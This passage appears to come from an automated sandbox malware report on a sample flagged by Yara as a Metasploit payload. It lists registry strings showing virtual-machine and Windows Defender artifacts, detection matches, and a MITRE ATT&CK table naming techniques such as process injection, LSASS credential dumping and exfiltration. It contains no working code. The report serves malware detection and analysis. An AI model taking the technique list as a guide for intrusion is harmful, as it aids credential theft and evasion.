              Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.drBinary or memory string: MsMpEng.exe

              Remote Access Functionality

              barindex
              Yara detected Metasploit Payload
              Source: Yara matchFile source: 443_2003_https-df.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		1
              Process Injection              		1
              Process Injection              		OS Credential Dumping11
              Security Software Discovery              		Remote ServicesData from Local System1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              DLL Side-Loading              		LSASS Memory1
              System Information Discovery              		Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
              Ingress Tool Transfer              		Traffic DuplicationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.